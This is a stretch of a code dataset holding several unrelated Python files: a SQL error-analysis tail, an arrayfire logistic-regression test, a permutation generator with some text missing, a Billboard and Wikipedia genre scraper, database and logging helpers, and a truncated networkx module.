sorted_list[0]\n for idx in sorted_list:\n foreign_key_map[cols[idx]] = cols[midx]\n\n return foreign_key_map\n\n\ndef build_foreign_key_map_from_json(table):\n with open(table) as f:\n data = json.load(f)\n tables = {}\n for entry in data:\n tables[entry['db_id']] = build_foreign_key_map(entry)\n return tables", "repo_name": "PrachiJainxD/text-to-sql", "sub_path": "contributions/experiments/rewritten_utterance/error_analysis.py", "file_name": "error_analysis.py", "file_ext": "py", "file_size_in_byte": 46986, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlite3.connect", "line_number": 122, "usage_type": "call"}, {"api_name": "json.load", "line_number": 139, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 166, "usage_type": "call"}, {"api_name": "json.load", "line_number": 580, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 975, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1049, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1049, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 1095, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 1096, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 1200, "usage_type": "call"}, {"api_name": "json.load", "line_number": 1423, "usage_type": "call"}]}
+{"seq_id": "36140976505", "text": "# -*- compile-command: \"cd .. && ./6-unittest-af.sh\"; -*-\nimport unittest\nimport numpy\nfrom d3m import container, utils\nfrom d3m.metadata import base as metadata_base\nfrom common_primitives import dataframe_to_ndarray, dataset_to_dataframe, ndarray_to_dataframe\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.utils import shuffle\ndef M(s):\n print(s)\n return s\n\nimport arrayfire as af\nimport af_LogisticRegression\n\n\nrng = np.random.RandomState(0)\n\niris = datasets.load_iris()\niris.data, iris.target = shuffle(iris.data, iris.target, random_state=rng)\n\ndef ints_to_onehots(ints, num_classes):\n onehots = np.zeros((ints.shape[0], num_classes), dtype='float32')\n onehots[np.arange(ints.shape[0]), ints] = 1\n return onehots\n\nclass RefAfLogisticRegression:\n def __init__(self, alpha=0.1, lambda_param=1.0, maxerr=0.01, maxiter=1000, verbose=False):\n self.__alpha = alpha\n self.__lambda_param = lambda_param\n self.__maxerr = maxerr\n self.__maxiter = maxiter\n self.__verbose = verbose\n self.__weights = None\n\n\n def predict_proba(self, X):\n Z = af.matmul(X, self.__weights)\n return af.sigmoid(Z)\n\n\n def predict_log_proba(self, X):\n return af.log(self.predict_proba(X))\n\n\n def predict(self, X):\n probs = self.predict_proba(X)\n _, classes = af.imax(probs, 1)\n return classes\n\n\n def cost(self, X, Y):\n # Number of samples\n m = Y.dims()[0]\n\n dim0 = self.__weights.dims()[0]\n dim1 = self.__weights.dims()[1] if len(self.__weights.dims()) > 1 else None\n dim2 = self.__weights.dims()[2] if len(self.__weights.dims()) > 2 else None\n dim3 = self.__weights.dims()[3] if len(self.__weights.dims()) > 3 else None\n # Make the lambda corresponding to self.__weights(0) == 0\n lambdat = af.constant(self.__lambda_param, dim0, dim1, dim2, dim3)\n\n # No regularization for bias weights\n lambdat[0, :] = 0\n\n # Get the prediction\n H = self.predict_proba(X)\n\n # Cost of misprediction\n Jerr = -1 * af.sum(Y * af.log(H) + (1 - Y) * af.log(1 - H), dim=0)\n\n # Regularization cost\n Jreg = 0.5 * af.sum(lambdat * self.__weights * self.__weights, dim=0)\n\n # Total cost\n J = (Jerr + Jreg) / m\n\n # Find the gradient of cost\n D = (H - Y)\n dJ = (af.matmulTN(X, D) + lambdat * self.__weights) / m\n\n return J, dJ\n\n\n def train(self, X, Y):\n # Initialize parameters to 0\n self.__weights = af.constant(0, X.dims()[1], Y.dims()[1])\n\n for i in range(self.__maxiter):\n # Get the cost and gradient\n J, dJ = self.cost(X, Y)\n err = af.max(af.abs(J))\n if err < self.__maxerr:\n print('Iteration {0:4d} Err: {1:4f}'.format(i + 1, err))\n print('Training converged')\n return self.__weights\n\n if self.__verbose and ((i+1) % 10 == 0):\n print('Iteration {0:4d} Err: {1:4f}'.format(i + 1, err))\n\n # Update the weights via gradient descent\n self.__weights = self.__weights - self.__alpha * dJ\n\n if self.__verbose:\n print('Training stopped after {0:d} iterations'.format(self.__maxiter))\n\n\n def eval(self):\n af.eval(self.__weights)\n af.sync()\n\n\nclass AFLogisticLogisticRegression(unittest.TestCase):\n def test_basic(self):\n num_classes = np.unique(iris.target).shape[0]\n\n # Convert numpy array to af array; convert labels from ints to one-hot encodings\n train_feats = af.from_ndarray(iris.data.astype('float32'))\n train_targets = af.from_ndarray(ints_to_onehots(iris.target.astype('uint32'), num_classes))\n test_feats = af.from_ndarray(iris.data.astype('float32'))\n test_targets = af.from_ndarray(ints_to_onehots(iris.target.astype('uint32'), num_classes))\n\n num_train = train_feats.dims()[0]\n num_test = test_feats.dims()[0]\n\n ref_clf = RefAfLogisticRegression(alpha=0.1, # learning rate\n lambda_param = 1.0, # regularization constant\n maxerr=0.01, # max error\n maxiter=1000, # max iters\n verbose=False # verbose mode\n )\n\n ref_clf.train(train_feats, train_targets)\n af_output = ref_clf.predict(test_feats)\n ref_output = af_output.to_ndarray()\n print('Completed reference calculation')\n\n # import pdb; pdb.set_trace()\n\n # actual d3m attempted arrayfire fails w/ missing columns method\n hyperparams = af_LogisticRegression.Hyperparams.defaults()\n\n test_clf = af_LogisticRegression.af_LogisticRegression(hyperparams=hyperparams)\n train_set = iris.data\n targets = iris.target\n test_clf.set_training_data(inputs=train_set, outputs=targets)\n test_clf.fit()\n\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "pv-pterab-s/bootstrap-d3m-arrayfire-docker", "sub_path": "tests/test_af_LogisticRegression.py", "file_name": "test_af_LogisticRegression.py", "file_ext": "py", "file_size_in_byte": 5065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.random.RandomState", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 20, "usage_type": "name"}, {"api_name": "sklearn.utils.shuffle", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "arrayfire.matmul", "line_number": 39, "usage_type": "call"}, {"api_name": "arrayfire.sigmoid", "line_number": 40, "usage_type": "call"}, {"api_name": "arrayfire.log", "line_number": 44, "usage_type": "call"}, {"api_name": "arrayfire.imax", "line_number": 49, "usage_type": "call"}, {"api_name": "arrayfire.constant", "line_number": 62, "usage_type": "call"}, {"api_name": "arrayfire.sum", "line_number": 71, "usage_type": "call"}, {"api_name": "arrayfire.log", "line_number": 71, "usage_type": "call"}, {"api_name": "arrayfire.sum", "line_number": 74, "usage_type": "call"}, {"api_name": "arrayfire.matmulTN", "line_number": 81, "usage_type": "call"}, {"api_name": "arrayfire.constant", "line_number": 88, "usage_type": "call"}, {"api_name": "arrayfire.max", "line_number": 93, "usage_type": "call"}, {"api_name": "arrayfire.abs", "line_number": 93, "usage_type": "call"}, {"api_name": "arrayfire.eval", "line_number": 110, "usage_type": "call"}, {"api_name": "arrayfire.sync", "line_number": 111, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 116, "usage_type": "call"}, {"api_name": "arrayfire.from_ndarray", "line_number": 119, "usage_type": "call"}, {"api_name": "arrayfire.from_ndarray", "line_number": 120, "usage_type": "call"}, {"api_name": "arrayfire.from_ndarray", "line_number": 121, "usage_type": "call"}, {"api_name": "arrayfire.from_ndarray", "line_number": 122, "usage_type": "call"}, {"api_name": "af_LogisticRegression.Hyperparams.defaults", "line_number": 142, "usage_type": "call"}, {"api_name": "af_LogisticRegression.Hyperparams", "line_number": 142, "usage_type": "attribute"}, {"api_name": "af_LogisticRegression.af_LogisticRegression", "line_number": 144, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 153, "usage_type": "call"}]}
+{"seq_id": "23339043319", "text": "\"\"\"\nperm_comb\n\nperm_comb=permutations+combinations:\n\tcombinations('ABCD', 2) --> AB AC AD\n\tpermutations('ABCD', 2) --> AB AC AD BA BC\n\tperm_comb :: [a]->[uint]->[[{a}]]\n\tcomb_comb :: [a]->{uint:uint}->[{{a}}]\n\tperm :: [a]->uint->[[a]]\n\tcomb :: [a]->uint->[{a}]\n\tperm(it,n)~perm_comb(it,[1]*n)\n\tcomb(it,n)~perm_comb(it,[n])\n\n\"\"\"\n\n\nfrom common_short_hand import *\nfrom itertools import (\n\tpermutations\n\t, product as product_\n\t, combinations\n\t, combinations_with_replacement\n\t)\n\n#perm_comb :: [a]->[uint]->[[{a}]]\n#comb_comb :: [a]->{uint:uint}->[{{a}}]\n\n\n\n\n#product==_permutations_with_replacement\ndef _combinations_with_replacement(n, r):\n\t# combinations_with_replacement('ABC', 2) --> AA AB AC BB BC CC\n\t# :: uint -> uint -> [[uint]]\n\t# :: uint -> uint -> sorted_lt[sorted_le[uint]]\n\t# :: @n:uint. @r:uint. sorted_lt[sorted_le[uint{%n}]{len=r}]\n\trange(r,n)\n\tif n<0 or r<0 or (n==0 and r>0):\n\t\treturn\n\t\n\tindices = [0] * r\n\tyield tuple(indices)\n\tn1 = n-1\n\twhile True:\n\t\tfor i in reversed(range(r)):\n\t\t\tif indices[i] != n1:\n\t\t\t\tbreak\n\t\telse:\n\t\t\treturn\n\t\tindices[i:] = [indices[i] + 1] * (r - i)\n\t\tyield tuple(indices)\n#product==_permutations_with_replacement\ndef _permutations_with_replacement(n, r):\n\t# product('ABCD', 'xy') --> Ax Ay Bx By Cx Cy Dx Dy\n\t# product(range(2), repeat=3) --> 000 001 010 011 100 101 110 111\n\t# :: uint -> uint -> [[uint]]\n\t# :: uint -> uint -> sorted_lt[[uint]]\n\t# :: @n:uint. @r:uint. sorted_lt[[uint{%n}]{len=r}]\n\trange(r,n)\n\tif n<0 or r<0 or (n==0 and r>0):\n\t\treturn\n\t\n\tindices = [0] * r\n\tyield tuple(indices)\n\tn1 = n-1\n\twhile True:\n\t\tfor i in reversed(range(r)):\n\t\t\tif indices[i] != n1:\n\t\t\t\tbreak\n\t\telse:\n\t\t\treturn\n\t\tindices[i] += 1\n\t\tindices[i+1:] = [0] * (r-1 - i)\n\t\tyield tuple(indices)\n\ndef _combinations(n, r):\n\t# combinations('ABCD', 2) --> AB AC AD BC BD CD\n\t# combinations(range(4), 3) --> 012 013 023 123\n\t# :: uint -> uint -> [{uint}]\n\t# :: uint -> uint -> [[uint]]\n\t# :: uint -> uint -> sorted_lt[sorted_lt[uint]]\n\t# :: @n:uint. @r:uint. sorted_lt[sorted_lt[uint{%n}]{len=r}]\n\trange(r,n)\n\tit = _combinations_with_replacement(n-r+1, r)\n\trs = range(r)\n\tfor indices in it:\n\t\tyield tuple(map(opss.add, rs, indices))\n\ndef _permutations(n, r):\n\t# permutations('ABCD', 2) --> AB AC AD BA BC BD CA CB CD DA DB DC\n\t# permutations(range(3)) --> 012 021 102 120 201 210\n\t# :: uint -> uint -> [[uint]]\n\t# :: uint -> uint -> sorted_lt[unique[uint]]\n\t# :: @n:uint. @r:uint. sorted_lt[unique[uint{%n}]{len=r}]\n\trange(r,n)\n\tif not 0 <= r <= n:\n\t\treturn\n\t\n\tidc = list(range(n))\n\t#js = list(range(1, r+1))\n\tjs = [nnn]*r\n\ti = 0\n\t\"\"\"\n\t0 <= i <= r\n\tidc[:i] fixed\n\tidc[i:] sorted_lt\n\t[n>=i'>=i>0]:\n\t\tj = js[i'-1]\n\t\t0 <= i'-1 < j <= n\n\t\tk = idc[i'-1]\n\t\tidc[j-1] <= k\n\t\t[j idc[n-1]\n\t\t\t#if __debug__:\n\t\t\tnew_i1 = i1\n\t\t\tnew_i = i1+1\n\t\t\tassert 0 < new_i <= i == r\n\t\t\ttry:\n\t\t\t\tassert all(idc[x] > idc[x+1] for x in rg(new_i, i-1))\n\t\t\t\tassert not new_i idc[n-1]\n\t\t\t\t#too slow:assert all(idc[x] < idc[x+1] for x in rg(i, n-1))\n\t\t\t\tif new_i < i:\n\t\t\t\t\tassert all(idc[x] < idc[x+1] for x in rg(i, n-1))\n\t\t\texcept:\n\t\t\t\tprn(\"n,r; i,new_i,j; js; idc\", locs())\n\t\t\t\traise\n\t\t\t#swap i1,j\n\t\t\t#before swap, restore idc[i1+1:]\n\t\t\t\n\t\t\tif new_i < i:\n\t\t\t\t#restore idc[new_i:]\n\t\t\t\t#bug: idc[new_i:] = idc[i:] + idc[new_i:i]\n\t\t\t\tidc[new_i:] = [*idc[i:], *reversed(idc[new_i:i])]\n\t\t\t\tassert len(idc) == n\n\t\t\t\n\t\t\ti = new_i\n\t\t\t#swap i1,j\n\t\t\ttry:\n\t\t\t\tif i==j:\n\t\t\t\t\tassert idc[j-1] == idc[i1] < idc[j]\n\t\t\t\telse:\n\t\t\t\t\tassert idc[j-1] < idc[i1] < idc[j]\n\t\t\texcept:\n\t\t\t\tprn(\"n,r; i,j; js; idc\", locs())\n\t\t\t\traise\n\t\t\tidc[i1], idc[j] = idc[j], idc[i1]\n\t\t\tjs[i1] = j+1\n\ndef _ts(f, g):\n\tfor n in rg(0, 5):\n\t\tfor r in rg(0, 5):\n\t\t\t[*a] = f(rg(n), r)\n\t\t\t[*b] = g(n, r)\n\t\t\ttry:\n\t\t\t\tassert a==b\n\t\t\texcept:\n\t\t\t\tpr(f, g)\n\t\t\t\tpr(n, r)\n\t\t\t\tpr(a)\n\t\t\t\tpr(b)\n\t\t\t\traise\n\ndef __product(it, r):\n\treturn product_(it, repeat=r)\ndef _tss():\n\t_ts(combinations, _combinations)\n\t_ts(permutations, _permutations)\n\t_ts(combinations_with_replacement, _combinations_with_replacement)\n\t_ts(__product, _permutations_with_replacement)\n\n\n##############\ndef perm_comb(n, rs):\n\t# perm_comb(4, [2,1]) --> 012 013 021 023 031 032 120 123 130 132 230 231\n\t# :: uint -> [uint] -> [[uint]]\n\t# :: uint -> [uint] -> sorted_lt[unique[uint]{as[{uint}]}]\n\t# :: @n:uint. @rs:[uint]. sorted_lt[unique[uint{%n}]{len=sum(rs)}{as[{uint}]}]\n\trs = (*rs,)\n\tr = sum(rs)\n\tfor r_ in rs: range(r_,n)\n\tif not (0 <= r <= n\n\t\t\t\tand all(r_ >= 0 for r_ in rs)\n\t\t\t\t):\n\t\treturn\n\t\n\ti2sz = [\n\t\tsz\n\t\tfor r_ in rs\n\t\tfor sz in reversed(rg(r_))\n\t\t]\n\t\t# remain size of block that cover index i\n\t\n\t\t\n\t#############\n\tidc = list(range(n))\n\t#js = list(range(1, r+1))\n\tjs = [nnn]*r\n\ti = 0\n\t\"\"\"\n\t0 <= i <= r\n\tidc[:i] fixed\n\tidc[i:] sorted_lt\n\t[n>=i'>=i>0]:\n\t\tj = js[i'-1]\n\t\t0 <= i'-1 < j <= n\n\t\tk = idc[i'-1]\n\t\tidc[j-1] <= k\n\t\t[j i:\n\t\t\t\t\t\t\t_e = i\n\t\t\t\t\t\tss.append((_b,_e))\n\t\t\t\t\t\t_b = _e\n\t\t\t\t\tif i < n:\n\t\t\t\t\t\tss.append((i,n))\n\t\t\tif __debug__ and new_i < i:\n\t\t\t\ttry:\n\t\t\t\t\tfor _b,_e in ss:\n\t\t\t\t\t\tfor _i in rg(_b,_e-1):\n\t\t\t\t\t\t\tassert idc[_i] < idc[_i+1]\n\t\t\t\t\tfor x in rg(len(ss)-1):\n\t\t\t\t\t\t_pre_b = ss[x][0]\n\t\t\t\t\t\t_e = ss[x+1][1]\n\t\t\t\t\t\tassert idc[_pre_b] > idc[_e-1]\n\t\t\t\t\t\t\n\t\t\t\texcept:\n\t\t\t\t\tprn(\"n,r; i,new_i,j; js; idc\", locs())\n\t\t\t\t\traise\n\t\t\t#swap i1,j\n\t\t\t#before swap, restore idc[i1+1:]\n\t\t\t\n\t\t\tif new_i < i:\n\t\t\t\t#restore idc[new_i:]\n\t\t\t\tfor _b,_e in ss:\n\t\t\t\t\trvs(idc, _b,_e)\n\t\t\t\trvs(idc, new_i, n)\n\t\t\t\tassert len(idc) == n\n\t\t\t\tassert all(idc[x] < idc[x+1] for x in rg(new_i, n-1))\n\t\t\t\n\t\t\ti = new_i\n\t\t\t#swap i1,j\n\t\t\ttry:\n\t\t\t\tif i==j:\n\t\t\t\t\tassert idc[j-1] == idc[i1] < idc[j]\n\t\t\t\telse:\n\t\t\t\t\tassert idc[j-1] < idc[i1] < idc[j]\n\t\t\texcept:\n\t\t\t\tprn(\"n,r; i,j; js; idc\", locs())\n\t\t\t\traise\n\t\t\tidc[i1], idc[j] = idc[j], idc[i1]\n\t\t\tjs[i1] = j+1\n\t\t\t###########\n\t\t\t###########\n\t\t\t###########\n\t\t\tsz = i2sz[i1]\n\t\t\tif sz:\n\t\t\t\t# idc[i1] is update\n\t\t\t\t# now fill the tail of curr block\n\t\t\t\tjj = js[i1]\n\t\t\t\tif i < jj:\n\t\t\t\t\t#(i,jj,jj+sz) >> sz\n\t\t\t\t\tlshf(idc, -sz, i,jj+sz)\n\t\t\t\tjs[i:i+sz] = rg(jj+1, jj+sz+1)\n\t\t\t\tassert len(js) == r\n\t\t\t\ti += sz\n\n\n\ndef _t_perm_comb():\n\t# perm_comb(4, [2,1]) --> 012 013 021 023 031 032 120 123 130 132 230 231\n\tts = [\n\t\t#n,rs,ans\n\t\t(4, [0,2,0,0,1,0]\n\t\t\t, [(*map(int, s),)\n\t\t\t\tfor s in \"012 013 021 023 031 032 120 123 130 132 230 231\"\n\t\t\t\t.split()\n\t\t\t\t]\n\t\t),(0,[0,0,0]\n\t\t\t\t,[()]\n\t\t),(0,[1]\n\t\t\t\t,[]\n\t\t),(1,[1,0]\n\t\t\t\t,[(0,)]\n\t\t#),(5, [2,2,0,1],[]\n\t\t)\n\t\t]\n\tts += [\n\t\t(n, [1]*r\n\t\t\t,[*permutations(rg(n), r)]\n\t\t)\n\t\tfor n in rg(5)\n\t\tfor r in rg(5)\n\t\t]\n\tts += [\n\t\t(n, [r]\n\t\t\t,[*combinations(rg(n), r)]\n\t\t)\n\t\tfor n in rg(5)\n\t\tfor r in rg(5)\n\t\t]\n\t\n\n\tfor n,rs,ans in ts:\n\t\t[*r] = perm_comb(n, rs)\n\t\ttry:\n\t\t\tassert r==ans\n\t\texcept:\n\t\t\tprn('n,rs;ans;r', locs())\n\t\t\traise\n\n\nif __name__ == \"__main__\":\n\t_tss()\n\t_t_perm_comb()\n\n\n\n\n", "repo_name": "edt-yxz-zzd/txt_phone", "sub_path": "txt/script/seed_/perm_comb[ver1].py", "file_name": "perm_comb[ver1].py", "file_ext": "py", "file_size_in_byte": 8293, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "itertools.product", "line_number": 191, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 193, "usage_type": "argument"}, {"api_name": "itertools.permutations", "line_number": 194, "usage_type": "argument"}, {"api_name": "itertools.combinations_with_replacement", "line_number": 195, "usage_type": "argument"}, {"api_name": "itertools.permutations", "line_number": 369, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 376, "usage_type": "call"}]}
+{"seq_id": "18081231104", "text": "# %%\nimport billboard\nfrom datetime import date\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\n# %%\nstart_year = 1990\nend_year = 2022\n\nyear_charts = {} # Dictionary to hold data for all dates\n\nfor year in range(start_year, end_year + 1):\n daterange = (\n pd.date_range(f\"{year}-01-01\", f\"{year}-12-31\", freq=\"W\")\n .strftime(\"%Y-%m-%d\")\n .tolist()[:52]\n )\n\n for idx, date in enumerate(daterange):\n print(f\"Fetching data for {year}, week {idx + 1}\")\n chart = billboard.ChartData(\"hot-100\", date=date)\n song_list = []\n artist_list = []\n rank_list = []\n\n for song in chart:\n song_list.append(song.title)\n artist_list.append(song.artist)\n rank_list.append(song.rank)\n\n if date not in year_charts:\n year_charts[date] = {\n \"song\": [],\n \"artist\": [],\n \"rank\": [],\n }\n\n year_charts[date][\"song\"].extend(song_list)\n year_charts[date][\"artist\"].extend(artist_list)\n year_charts[date][\"rank\"].extend(rank_list)\n\n\n# %%\n# Initialize a dictionary to store song-rank mappings for each date\nsong_ranks = {}\n\n# Collect song ranks for each date\nfor date, data in year_charts.items():\n for idx, song in enumerate(data[\"song\"]):\n artist = data[\"artist\"][idx]\n rank = data[\"rank\"][idx]\n if (artist, song) not in song_ranks:\n song_ranks[(artist, song)] = {}\n song_ranks[(artist, song)][date] = rank\n\n# Create a DataFrame from the collected song ranks\ndate_columns = list(year_charts.keys())\ncolumns = [\"Artist\", \"Song\"] + date_columns\ndata_rows = []\n\nfor (artist, song), ranks in song_ranks.items():\n row = [artist, song]\n for date in date_columns:\n row.append(ranks.get(date, float(\"NaN\")))\n data_rows.append(row)\n\nsongs_df = pd.DataFrame(data_rows, columns=columns)\n\n# Display the resulting DataFrame\nprint(songs_df)\n\n# %%\nsongs_df.to_excel(\"songs_df.xlsx\", index=False)\n\n# %%\n# Load the data\nexcel_file_name = \"songs_df.xlsx\"\n# Read the Excel file into a dictionary of dataframes\nsongs_df = pd.read_excel(excel_file_name)\n\n\n# %%\n# Function to generate Wikipedia URLs for artists\ndef generate_wikipedia_urls(artist):\n # Replace spaces with underscores and create Wikipedia URL\n return f\"https://en.wikipedia.org/wiki/{artist.replace(' ', '_')}\"\n\n\n# Add a new column 'Wikipedia_Page' with Wikipedia URLs\nsongs_df[\"Wikipedia_Page\"] = songs_df[\"Artist\"].apply(generate_wikipedia_urls)\n\n# Display the updated DataFrame\nprint(songs_df)\n\n\n# %%\n# Function to scrape artist's genre from Wikipedia\ndef scrape_artist_genre(url):\n try:\n response = requests.get(url, timeout=10) # Set a timeout to prevent hanging\n if response.status_code == 200:\n soup = BeautifulSoup(response.content, \"html.parser\")\n infobox = soup.find(\"table\", {\"class\": \"infobox\"})\n if infobox:\n rows = infobox.find_all(\"tr\")\n for row in rows:\n if row.th and row.th.text.strip() == \"Genres\":\n genres = row.td.text.strip()\n return genres\n return None\n except requests.RequestException as e:\n print(f\"Request Exception: {e}\")\n return None\n\n\n# Iterate through each row and fetch genre for each artist's Wikipedia page\nfor index, row in songs_df.iterrows():\n url = row[\"Wikipedia_Page\"]\n artist = row[\"Artist\"]\n genre = scrape_artist_genre(url)\n songs_df.loc[songs_df[\"Artist\"] == artist, \"Genre\"] = genre\n print(f\"Artist: {artist} - Genre: {genre}\")\n\n# Display the updated DataFrame\nprint(songs_df[\"Genre\"])\n# %%\ngenre_df = songs_df[[\"Artist\", \"Genre\"]]\ngenre_df = genre_df.drop_duplicates(subset=[\"Artist\"], keep=\"first\")\n\n# %%\nprint(genre_df[\"Artist\"].count() - genre_df[\"Genre\"].count(), \"songs have null genre.\")\n# %%\ngenre_df.to_excel(\"genre_df.xlsx\", index=False)\n\n# %%\n", "repo_name": "alonbenach/music_data", "sub_path": "scraper_top100.py", "file_name": "scraper_top100.py", "file_ext": "py", "file_size_in_byte": 3981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.date_range", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 21, "usage_type": "name"}, {"api_name": "billboard.ChartData", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 23, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 33, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 34, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 40, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 41, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 42, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 50, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 56, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 65, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 66, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 81, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 102, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 104, "usage_type": "call"}, {"api_name": "requests.RequestException", "line_number": 113, "usage_type": "attribute"}]}
+{"seq_id": "33865847051", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"Provides utilities for connecting to SQL databases and for logging.\"\"\"\n\nfrom configparser import ConfigParser\nimport logging\nimport os\nimport sqlalchemy\nfrom utilities.decorators import error_trap\n\n\ndef _get_config(filename, section):\n parser = ConfigParser() # create a parser\n parser.read(filename) # read config file\n\n # get section\n db = {}\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = param[1]\n else:\n raise Exception('\"{}\" section not found in {}'.format(section,\n filename))\n return db\n\n\n@error_trap\ndef _connect(section, filename):\n # read connection parameters and build connection url\n params = _get_config(filename, section)\n dialect = params['dialect']\n if params.get('connector'):\n dialect += '+' + params['connector']\n db_url = '{}://{}:{}@{}'.format(dialect, params['user'],\n params['password'], params['host'])\n if params.get('port'):\n db_url += ':{}'.format(params['port'])\n db_url += '/{}'.format(params['dbname'])\n\n # connect to the SQL server\n print('Connecting to the database...')\n con = sqlalchemy.create_engine(db_url).connect()\n if params.get('search_path'):\n con.execute('SET search_path TO ' + params['search_path'])\n\n # display the database name, and server dialect and version\n db_version = con.execute('SELECT version()').fetchall()[0][0]\n print('{} -- {} VERSION {}'.format(params['dbname'].upper(),\n params['dialect'].upper(),\n db_version))\n return con\n\n\ndef connect(section,\n filename=os.path.expanduser('~/projects/utilities/database.ini')):\n \"\"\"Connect to the SQL database server and return connectable.\"\"\"\n con, err = _connect(section, filename)\n if err:\n print(err)\n return None\n else:\n return con\n\n\nclass Logger(object):\n def __init__(self, name=__name__, log_path='.', log_file='out.log',\n logger_level=logging.DEBUG, file_level=logging.DEBUG,\n stream_level=logging.ERROR, date_format='%Y-%m-%d %H:%M:%S',\n log_format='%(asctime)s - %(name)s - ' +\n '%(levelname)s - %(message)s'):\n self.logger = logging.getLogger(name)\n self.logger.setLevel(logger_level)\n fh = logging.FileHandler(os.path.join(log_path, name + '-' + log_file))\n fh.setLevel(file_level)\n ch = logging.StreamHandler()\n ch.setLevel(stream_level)\n formatter = logging.Formatter(log_format, datefmt=date_format)\n ch.setFormatter(formatter)\n fh.setFormatter(formatter)\n self.logger.addHandler(ch)\n self.logger.addHandler(fh)\n\n def critical(self, message):\n return self.logger.critical(message)\n\n def debug(self, message):\n return self.logger.debug(message)\n\n def error(self, message):\n return self.logger.error(message)\n\n def exception(self, message):\n return self.logger.exception(message)\n\n def info(self, message):\n return self.logger.info(message)\n\n def warning(self, message):\n return self.logger.warning(message)\n", "repo_name": "robburnett7/utilities", "sub_path": "general_utilities.py", "file_name": "general_utilities.py", "file_ext": "py", "file_size_in_byte": 3360, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "configparser.ConfigParser", "line_number": 13, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 43, "usage_type": "call"}, {"api_name": "utilities.decorators.error_trap", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 68, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 72, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "22761263516", "text": "import networkx as nx\nfrom graph.base import GraphBaseModule\n\n\nclass TopologyModule(GraphBaseModule):\n def __init__(self, DG=None):\n self.DG = DG\n if not self.DG:\n super(TopologyModule, self).__init__()\n self.create()\n\n def mutuals(self, node: str = None, depth_limit: int = None):\n mutual_graph = nx.Graph()\n\n if depth_limit is None:\n nodes = list(self.DG.nodes())\n num_nodes = len(nodes)\n\n for i in range(num_nodes):\n for j in range(i+1, num_nodes):\n if self.DG.has_edge(nodes[i], nodes[j]) and self.DG.has_edge(nodes[j], nodes[i]):\n mutual_graph.add_edge(nodes[i], nodes[j])\n\n return mutual_graph\n\n else:\n not_visited = list()\n not_visited.append(node)\n\n depth = 0\n while len(not_visited) != 0:\n depth += 1\n current_node = not_visited.pop(0)\n for (source, target) in self.DG.edges(current_node):\n if self.DG.has_edge(target, source):\n not_visited.append(target)\n mutual_graph.add_edge(source, target)\n\n if depth == depth_limit:\n break\n\n return mutual_graph\n\n def neighbourhood_depth(self, node, neighbour_depth):\n neighbours_graph = nx.DiGraph()\n for source, target in nx.bfs_edges(self.DG, node, depth_limit=neighbour_depth):\n neighbours_graph.add_edge(source, target)\n\n edge_attributes = {(source, target): self.DG[source][target]}\n nx.set_edge_attributes(neighbours_graph, edge_attributes)\n\n source_node_attributes = {source: self.DG.nodes(data=True)[source]}\n target_node_attributes = {target: self.DG.nodes(data=True)[target]}\n\n nx.set_node_attributes(neighbours_graph, source_node_attributes)\n nx.set_node_attributes(neighbours_graph, 